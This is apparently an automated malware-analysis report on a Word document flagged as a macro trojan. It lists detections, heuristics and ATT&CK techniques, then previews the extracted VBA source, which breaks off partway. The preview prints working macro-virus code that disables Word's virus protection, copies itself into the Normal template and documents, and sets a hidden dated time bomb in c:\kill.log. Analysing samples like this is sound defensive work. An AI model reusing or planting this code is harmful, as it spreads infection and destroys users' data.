MALICIOUS
280
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with multiple signatures, including Win.Trojan.Pivis-2 and Doc.Trojan.Akuma-3. The presence of AutoOpen, Document_Open, and Auto_Close macros indicates a high likelihood of malicious VBA code execution. The Document_Close subroutine attempts to create and manage a file at 'c:\kill.log', suggesting a persistence or staging mechanism.
Heuristics 6
-
ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Pivis-2
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 32161 bytes |
SHA-256: 8a1d7680bf2346620ba7833a90a45d9bf1d751ac8e9dec8bc3ff01fd3086ad53 |
|||
|
Detection
ClamAV:
Doc.Trojan.Akuma-3
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
'Stand
'2
On Error Resume Next
If Dir("c:\kill.log", vbArchive + vbHidden + vbReadOnly) = "" Then
Open "c:\kill.log" For Output As #1
Randomize
Dataccia = DateAdd("d", Int((30 * Rnd) + 1), Date)
Print #1, Dataccia
Close #1
SetAttr "c:\kill.log", vbArchive + vbHidden + vbReadOnly
Else
Open "c:\kill.log" For Input As #1
Line Input #1, Dataccia
If DateDiff("d", Date, Dataccia) <= 0 Then StandDestroy
Close #1
End If
End Sub
Private Sub Document_Open()
'Stand
'2
Stand
End Sub
Private Sub Document_New()
'Stand
'2
Stand
End Sub
Private Sub Stand()
'Stand
'2
'Copies: 62
On Error Resume Next
stato = ActiveDocument.Saved
Application.EnableCancelKey = Not -1
With Options
.ConfirmConversions = False
.VirusProtection = False
.SaveNormalPrompt = False
End With
Application.DisplayRecentFiles = True
RecentFiles.Maximum = 9
Set mad = NormalTemplate.VBProject.VBComponents.Item(1)
For c = 1 To 2
If Left(StandFind(mad, "Private Sub Stand()", True), Len("Stand Yes")) = "Stand Yes" Then GoTo NoClear
lm = StandClear(mad, "Sub Document_Close()")
lm = StandClear(mad, "Private Sub Document_Close()")
lm = StandClear(mad, "Sub Document_New()")
lm = StandClear(mad, "Private Sub Document_New()")
lm = StandClear(mad, "Sub Document_Open()")
lm = StandClear(mad, "Private Sub Document_Open()")
lm = StandClear(mad, "Sub AutoClose()")
lm = StandClear(mad, "Private Sub AutoClose()")
lm = StandClear(mad, "Sub AutoOpen()")
lm = StandClear(mad, "Private Sub AutoOpen()")
lm = StandClear(mad, "Sub AutoNew()")
lm = StandClear(mad, "Private Sub AutoNew()")
lm = StandClear(mad, "Private Sub Stand()")
lm = StandClear(mad, "Private Function StandClear(DoveM, StartM)")
lm = StandClear(mad, "Private Sub StandDestroy()")
lm = StandClear(mad, "Private Function StandFind(DoveM, StartM, Infect)")
lm = StandClear(mad, "Private Function StandInfect()")
lm = StandClear(mad, "Private Function StandWrite(StartM)")
NoClear:
Set mad = ActiveDocument.VBProject.VBComponents.Item(1)
Next c
SetAttr "c:\Stand.log", vbNormal
Kill "c:\Stand.log"
Open "c:\Stand.log" For Output As #1
lm = StandWrite("Private Sub Document_Close()")
lm = StandWrite("Private Sub Document_Open()")
lm = StandWrite("Private Sub Document_New()")
lm = StandWrite("Private Sub Stand()")
lm = StandWrite("Private Function StandClear(DoveM, StartM)")
lm = StandWrite("Private Sub StandDestroy()")
lm = StandWrite("Private Function StandFind(DoveM, StartM, Infect)")
lm = StandWrite("Private Function StandInfect()")
lm = StandWrite("Private Function StandWrite(StartM)")
Close #1
SetAttr "c:\Stand.log", vbNormal
lm = StandInfect
Kill "c:\Stand.log"
Randomize
If Int((10 * Rnd) + 1) = 6 Then
With Dialogs(wdDialogFileSummaryInfo)
.Title = "Stand Macro Carrier"
.Author = "Lonely Mad"
.Keywords = "I'll destroy you"
.Execute
End With
End If
If Left(ActiveDocument.Name, 8) <> "Document" And lm = 2 Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If
ActiveDocument.Saved = stato
On Error GoTo 0
End Sub
Private Function StandClear(DoveM, StartM)
'Stand
'2
Count = StandFind(DoveM, StartM, True)
If Left(Count, 5) <> "Stand" Then
Do Until DoveM.CodeModule.Lines(Count, 1) = "End Sub" Or DoveM.CodeModule.Lines(Count, 1) = "End Function"
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.